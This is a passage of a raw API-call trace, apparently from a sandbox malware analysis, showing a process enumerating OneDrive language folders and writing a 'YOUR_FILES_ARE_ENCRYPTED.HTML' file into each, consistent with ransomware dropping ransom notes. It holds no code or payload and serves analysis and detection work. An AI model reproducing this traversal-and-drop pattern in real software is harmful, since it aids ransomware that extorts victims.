lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\it", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\it\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\it\\*" [0112.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\it\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdab2e911, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdab2e911, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbda8c94, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.430] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdab2e911, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdab2e911, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbda8c94, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="..", cAlternateFileName="")) returned 1 [0112.430] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbda8c94, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbda8c94, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdce33339, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.430] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.430] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\it\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.430] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.430] lstrlenW (lpString=".mui") returned 4 [0112.430] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.430] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbda8c94, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbda8c94, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdce33339, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.430] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.430] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.430] GetProcessHeap () returned 0x600000 [0112.430] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\it\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\it\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0112.431] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.432] CloseHandle (hObject=0x334) returned 1 [0112.432] GetProcessHeap () returned 0x600000 [0112.432] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.432] GetProcessHeap () returned 0x600000 [0112.432] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.432] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe210ce16, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe210ce16, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xe210ce16, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ja", cAlternateFileName="")) returned 1 [0112.466] StrStrIW (lpFirst="ja", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.466] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ja") returned 78 [0112.467] GetProcessHeap () returned 0x600000 [0112.467] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.468] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ja" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ja") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ja" [0112.468] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ja", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ja\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ja\\*" [0112.468] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ja\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe210ce16, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe210ce16, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec58f0d9, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0112.468] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe210ce16, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe210ce16, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec58f0d9, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="..", cAlternateFileName="")) returned 1 [0112.469] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec58f0d9, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec58f0d9, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec9e1598, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0xfcc0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.469] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.469] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ja\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.469] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.469] lstrlenW (lpString=".mui") returned 4 [0112.469] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.469] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec58f0d9, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec58f0d9, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec9e1598, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0xfcc0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.469] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0112.469] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.469] GetProcessHeap () returned 0x600000 [0112.469] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\ja\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.470] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.471] CloseHandle (hObject=0x330) returned 1 [0112.471] GetProcessHeap () returned 0x600000 [0112.471] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.471] GetProcessHeap () returned 0x600000 [0112.471] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.472] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecf187d5, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xecf187d5, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xecf187d5, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ka", cAlternateFileName="")) returned 1 [0112.472] StrStrIW (lpFirst="ka", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.472] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ka") returned 78 [0112.472] GetProcessHeap () returned 0x600000 [0112.472] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.473] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ka" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ka") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ka" [0112.473] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ka", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ka\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ka\\*" [0112.473] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ka\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecf187d5, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xecf187d5, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xed5cd1ea, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.474] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecf187d5, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xecf187d5, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xed5cd1ea, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="..", cAlternateFileName="")) returned 1 [0112.474] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed5cd1ea, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xed5cd1ea, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeda459b8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.474] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.474] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ka\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.475] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.475] lstrlenW (lpString=".mui") returned 4 [0112.475] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.475] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed5cd1ea, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xed5cd1ea, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeda459b8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.475] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.475] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.475] GetProcessHeap () returned 0x600000 [0112.475] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\ka\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.475] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.476] CloseHandle (hObject=0x330) returned 1 [0112.476] GetProcessHeap () returned 0x600000 [0112.477] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.477] GetProcessHeap () returned 0x600000 [0112.477] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.477] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedade28a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xedade28a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xedade28a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kk", cAlternateFileName="")) returned 1 [0112.477] StrStrIW (lpFirst="kk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.477] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kk") returned 78 [0112.478] GetProcessHeap () returned 0x600000 [0112.478] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.479] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kk" [0112.479] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kk\\*" [0112.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedade28a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xedade28a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xede4b9d3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName=".", cAlternateFileName="")) returned 0x626778 [0112.479] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedade28a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xedade28a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xede4b9d3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="..", cAlternateFileName="")) returned 1 [0112.480] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xede4b9d3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xede4b9d3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xee29dc95, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.480] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.480] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kk\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.480] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.480] lstrlenW (lpString=".mui") returned 4 [0112.480] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.480] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xede4b9d3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xede4b9d3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xee29dc95, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.480] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0112.480] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.480] GetProcessHeap () returned 0x600000 [0112.480] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\kk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.481] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.482] CloseHandle (hObject=0x330) returned 1 [0112.482] GetProcessHeap () returned 0x600000 [0112.482] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.483] GetProcessHeap () returned 0x600000 [0112.483] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.484] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee3f513b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xee3f513b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xee3f513b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="km-kh", cAlternateFileName="")) returned 1 [0112.484] StrStrIW (lpFirst="km-kh", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.484] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\km-kh") returned 81 [0112.484] GetProcessHeap () returned 0x600000 [0112.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.485] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\km-kh" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\km-kh") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\km-kh" [0112.485] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\km-kh", lpString2="\\*" | out: 